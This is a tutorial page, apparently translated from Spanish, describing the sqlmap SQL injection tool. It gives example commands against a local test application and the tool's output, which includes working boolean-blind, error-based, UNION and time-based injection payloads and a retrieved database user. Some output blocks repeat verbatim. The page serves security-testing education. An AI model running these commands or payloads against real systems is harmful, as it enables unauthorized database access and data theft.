Menu
▾
▴
sqlmap-en
sqlmap
Phase(s):
Primary: Explitation.
Secondary: N/A.
Description:
Tool that helps identify and exploit SQL injection vulnerabilities handlers for multiple databases.
Objective:
- Detect SQL injection vulnerabilities.
- Exploit SQL injection vulnerabilities.
Features:
Supported technologies: Web application (HTTP/HTTPS).
Operative mode: Active.
Detect SQL injection vulnerabilities.
- Provides parameters vulnerable to SQL injections in web applications by multiple injection tests configurable ("payloads" time-based, blind, to name a few).
- Testing on the parameters sent by GET and POST methods.
- Determines the SQL handler you are using the web application in order to focus the tests:
- MySQL
- Oracle
- PostgreSQL
- MS SQL Server
- MS Access
- IBM DB2
- SQLite
- Firebird
- Sybase
- SAP MaxDB
Exploit SQL injection vulnerabilities.
- Provides capabilities to query and mining of the database that includes users, databases, tables, columns and present records, to name a few.
- Provides capabilities to execute functions on the server database (to the privileges of the database handler):
- Operating system commands.
- Creating and deleting files.
- Reading registry (Windows).
Reports:
Output reports: ✔
Reports in TXT, XML, HTML format containing:
- sqlite File: the results of the mining database made for local storage.
- "log.txt" File: with information of successful injections and the results obtained.
- "targets" File: with information from scanned targets
Basic usage:
Exploit a previously identified SQL injection. The following command starts scanning for the specified web application within a parameter.
./sqlmap.py -u 'http://127.0.0.1:9001/miaplicacion/page.jsp?busqueda=info' -p busqueda --output-dir='[Directorio]'
Where:
•-u: URL of the web application.
•-p: vulnerable to a SQL injection parameter.
• - output-dir: The directory where to export the results.
The tool starts with the evidence to determine whether the parameter is susceptible to SQL injection and determine the database manager in order to focus testing.
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:00:00
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:00:00] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:00:00] [INFO] target URL is stable
[00:00:00] [WARNING] reflective value(s) found and filtering out
[00:00:00] [INFO] heuristic (basic) test shows that GET parameter 'busqueda' might be injectable (possible DBMS: 'MySQL')
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:00:00
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:00:00] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:00:00] [INFO] target URL is stable
[00:00:00] [WARNING] reflective value(s) found and filtering out
[00:00:00] [INFO] heuristic (basic) test shows that GET parameter 'busqueda' might be injectable (possible DBMS: 'MySQL')
In the case that determines the data base manager, the tool would provide the option to focus the tests detected handler selected the 'Y'.
[00:00:00] [INFO] testing for SQL injection on GET parameter 'busqueda'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
The tool starts to perform all tests preloaded ("payloads") with the goal of identifying SQL injection as the "payload" required to exploit vulnerability in the case in which the test is successful, the message is included in "injectable"
[00:00:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:00:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[00:00:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:00:00] [INFO] testing 'MySQL inline queries'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[00:00:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:00:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[00:00:00] [INFO] target URL appears to be UNION injectable with 5 columns
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[00:00:00] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[00:00:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[00:00:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[00:00:00] [INFO] testing 'MySQL inline queries'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:00:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[00:00:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[00:00:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:00:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[00:00:00] [INFO] target URL appears to be UNION injectable with 5 columns
[00:00:00] [INFO] GET parameter 'busqueda' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[00:00:00] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
Based on the tests you perform, the tool identify SQL injection in order to prepare the tool for future operations. The tool will provide the option to scan other parameters in the application selected in this case the 'N' option to finish scanning whereby the results of successful tests were deployed, as well as information drawn: operating system, web server and database manager.
GET parameter 'busqueda' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: busqueda
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page.jsp?busqueda=-7808' OR (1013=1013)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: page.jsp?busqueda=test' AND (SELECT 3338 FROM(SELECT COUNT(*),CONCAT(0x3a6866673a,(SELECT
(CASE WHEN (3338=3338) THEN 1 ELSE 0 END)),0x3a6866753a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Wkqc'='Wkqc
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page.jsp?busqueda=test' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x3a6866673a,0x4e4a7056657854754662,0x3a6866753a),NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: page.jsp?busqueda=test' AND 4757=BENCHMARK(5000000,MD5(0x515a6f49)) AND 'BqjY'='BqjY
---
[00:00:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
[*] shutting down at 19:32:47
sqlmap identified the following injection points with a total of 74 HTTP(s) requests:
---
Place: GET
Parameter: busqueda
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page.jsp?busqueda=-7808' OR (1013=1013)#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: page.jsp?busqueda=test' AND (SELECT 3338 FROM(SELECT COUNT(*),CONCAT(0x3a6866673a,(SELECT
(CASE WHEN (3338=3338) THEN 1 ELSE 0 END)),0x3a6866753a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Wkqc'='Wkqc
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: page.jsp?busqueda=test' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x3a6866673a,0x4e4a7056657854754662,0x3a6866753a),NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: page.jsp?busqueda=test' AND 4757=BENCHMARK(5000000,MD5(0x515a6f49)) AND 'BqjY'='BqjY
---
[00:00:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[00:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
[*] shutting down at 19:32:47
The tool stores the results in the specified directory keeping track injections identified in order to be operated on later occasions without requiring initial verification.
Below we provide the following command to get information about the database handler, in this case the user name.
./sqlmap.py -u 'http://127.0.0.1:9001/miaplicacion/page.jsp?busqueda=info' --output-dir='/security/sqlmap/' --current-user
Where:
• -u: URL of the web application.
• - output-dir: The directory where to export the results.
• - current-user: Provides user name in the database.
The tool will scan maintaining previously been made and the knowledge of the "payload" shall obtain the required information from the database.
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:34:13
[00:00:00] [INFO] resuming back-end DBMS 'mysql'
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
…
[00:00:00] [INFO] fetching current user
current user: 'root@localhost'
[0:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It
is the end user's responsibility to obey all applicable local, state and federal laws. Developers
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:34:13
[00:00:00] [INFO] resuming back-end DBMS 'mysql'
[00:00:00] [INFO] testing connection to the target URL
[00:00:00] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
…
[00:00:00] [INFO] fetching current user
current user: 'root@localhost'
[0:00:00] [INFO] fetched data logged to text files under '/directorio/sqlmap/127.0.0.1'
Resources:
Link: http://sqlmap.org
Author(s): Bernardo Damele A. G.
Miroslav Stampar
Contact: sqlmap-users@lists.sourceforge.net
License: (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
GNU General Public License Version 2